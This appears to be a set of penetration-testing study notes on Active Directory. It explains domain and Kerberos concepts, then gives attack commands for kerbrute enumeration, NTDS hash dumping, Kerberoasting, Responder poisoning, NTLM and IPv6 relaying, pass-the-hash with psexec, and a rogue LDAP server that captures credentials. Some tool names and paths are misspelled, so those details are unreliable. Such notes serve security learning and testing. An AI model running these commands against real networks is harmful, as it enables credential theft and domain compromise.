📁Active Directory

What is Active Directory (AD)

A collection of machines and servers connected inside of a domain. They form part of what is known as a forest that makes up the Active Directory network.

Domain Controllers (DC)

  • The server running the Active Directory Domain Service (AD DS) is a Domain controller.

  • The centre of the Active Directory.

  • Controls the domain

    • Holds the AD DS data store.

    • Handle all authentication and authorization.

    • Allows admin access to manage domain resources.

AD DS Store

Holds database and processes needed to store and manage directory information.

  • Contains the NTDS.dit - DB with all the information of an AD Domain Controller as well as password hashes for users

  • Stored by default in %SystemRoot%\NTDS

  • Accessible only by DC

Forest

Collection of one or more domain trees inside an AD.

  • Trees - A hierarchy of AD DS

  • Domains - Used to group and manage objects

  • Trusts - Allows users to access resources in other domains

  • Objects - Users, groups, printers, computers

  • Domain Services - DNS, IPv6

  • Domain Schema - Object creation rules

  • Organizational Units (OU) - A hierarchy of existing users, groups and computers.

Windows domain is a group of users and computers.

Active directory is a domain that centralises the admin of common components of a Windows network.

Active Directory Domain Service (AD DS) acts as a catalogue that holds the information of all objects on your network.

User

  • People

  • Services

Machines

Security Groups - Grant permissions over resources.

Kerberos

Default auth service for Windows, it's intended to be way more secure than NTLM. Uses a third-party ticket service. Kerberos's ticket system is quite complicated and consists of many services, here are a few of them:

  • (TGT) Ticket Granting Ticket - Authentication ticket used to request tickets from the TGS

  • (TGS) Ticket Granting Service - Takes a TGT and returns a ticket

  • (KDC) Key Distribution Service - Service for issuing TGTs and service tickets, consists of the AS and TGS

  • (AS) Authentication Service - Issues TGTs to be used by the TGs in the domain

  • (SPN) Service Principal Name - An identifier given to a service to associate a service instance with a domain service account. Windows requires all services to have a domain service account.

  • (PAC) Privilege Attribute Certificate - Holds all the user's information which is sent with the TGT by the KDC to be signed to validate the user

Enumeration

setspn -T medin -Q ​ */*

Kerbrute 

./kerbrute userenum -dc DOMAIN.local -d DOMAIN.local <USERLIST.txt>

  • secretsdump.py DC.local/USER:PASS@10.10.112.47 -ntds NTDS.DIT

    • Allow us to dump the NTDS.DIT which lets us see all the hashes for the users

Keberoasting with Rebeus

Rubeus.exe kerberoast

AS-REP Roasting

Occurs when a user account has the privilege "Does not require Pre-Authentication" set. The account does not need to provide valid identification before requesting a ticket.

Harvesting Tickets using Rubeus

Another powerful tool for attacking Kerberos is an adaption of the Kekeo tool. Has many attacks like overpass the hash, ticket request, harvesting, pass the ticket, AS-REP Roasting and of course Kerberoasting.

To begin harvesting tickets from the KDC we make sure Rubues is Installed on the target machine

Rubeus.exe harvest /interval:<NUM_OF_SECONDS>

Password Spraying/ Bruteforcing using Rubeus

For brute forcing, Rebeus takes a single user and a word of passwords

With password spraying it takes a single password and tries it against all the user accounts in the domain.

We need to make sure the domain name and IP are in Windows hosts file

echo IP DOMAIN.local >> C:\WindowszSystem32\drivers\etc\hosts

Rubeus.exe brute /PASSWORD /notickets

Golden/Silver Ticket Attacks

Kerberos Backdoors

Initial Attack Vectors

LLMNR Poisoning

We can intercept the NetNTLM Challenge by using an MITM (Man-in-the-Middle) Attack by poisoning the response during NetNTLM Authentication, this tricks the client into talking to us instead of the real server they wanted to connect to.

Poisoning authentication challenges using Responder

sudo responder -I tun0 -dwp

In this case, we received back an SMBv2 connection and Responder extracted an NTLMv2_SSP Response

Then we used hashcat to crack it hashcat -m 5600 hash.txt password-list.txt --force

SMB Relays

Relay hashes to another machine and gain access

  • SMB signing must be disabled

  • User credentials should be admin on the machine

    • nmap --script=smb2-security-mode.nse -p445 <IP>

    • Create targets.txt with all vulnerable IP's

Steps to set up an attack

  1. sudo vi /etc/responder/Responder.conf - Make sure SMB and HTTP are switched off

  2. sudo responder -I tun0 -dwp

  3. sudo ntlmrelayx.py -tf targets.txt -smb2support

    1. -i gives us an interactive shell instead of a SAM dump

    2. -c lets you input a command like whoami

  4. Wait for an event...

Getting Shell Access

There are three main tools we can use:

psexec

wmiexec

smbexec

psexec.py <DOMAIN/AD-USER>:<'PASSWORD>'@<IP>

psexec.py <AD-USER>@<IP> - hashes <NTLM-HASH>

IPv6 Attacks

Diverting traffic from the victim's IPv6 by pretending we are a DNS server.

sudo ntlmrelayx.py -6 -t ldaps://<DC-IP> -wh fakepad.<DC> -l lootme

sudo mitm6 -d <DOMAIN>

After running this we can see a new folder called lootme with all of our AD information like Users and Groups

lootme

After waiting an admin logged in and our tool created a user on the Domain

Passback Attacks

LogoHow to Hack Through a Pass-Back Attack: MFP Hacking Guidewww.mindpointgroup.com

LDAP Passback Attack

A common attack against network devices, such as printers.

If you have gained initial access to the internal network, here are the basic steps.

Hosting a Rougue LDAP Server

install services: 

sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

Run the setup: sudo dpkg-reconfigure -p low slapd

Downgrade services: 

#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

Use NC to capture plaintext credentials nc -lvp 389

Internal Attack Strategy

  1. Run mitm6 or Responder

  2. Run scans to generate traffic

  3. If scans take too long look at websites - http_version

  4. Look for default creds

  5. Think outside the box

  6. Keep enumerating

Post Compromise Enumeration

Domain Enum

Idapdomaindump

ldapdomaindump ldaps:<IP> -u '<DC\AD-User>' -p <PASSWORD>

Bloodhound

Creates a GUI interpretation of our target AD network.

neo4j needs to be running first!

sudo neo4j console

First, we have to gather some data, this can be done with Sharphound if we have access to low-level account or with bloodhound-python

Then we can import the data to Bloodhound

The data was imported and we can now see the information below

Plumhound

Bloodhound for Blue and Purple Teams

sudo python3 Plumhounbf.py -x tasks/default.tasks -p neo4j1

Will generate reports based on current information from Bloodhound

cd reports - same directory as Plumhound installation

/opt/PlumHound

We can see all the reports on a handy webpage if we serve index.html

PingCastle

For auditing and risk assessment, it will generate a report based on its scan

Post Compromise Attacks

Pass the Password

crackmapexec smb IP/CIDR -u AD-USER -d DOMAIN.local -p PASSWORD

Cracking Hashes

Pass Attacks Mitigations

Keberoasting

Additional AD Attacks

ZeroLogon

PrintNightmare CVE

Configuration File Credentials

A way to try and find AD Credentials

  • Web app config files

  • Service config files

  • Registry keys

  • Centrally deployed apps

PreviousEmailNextInitial Enumeration

Last updated

Was this helpful?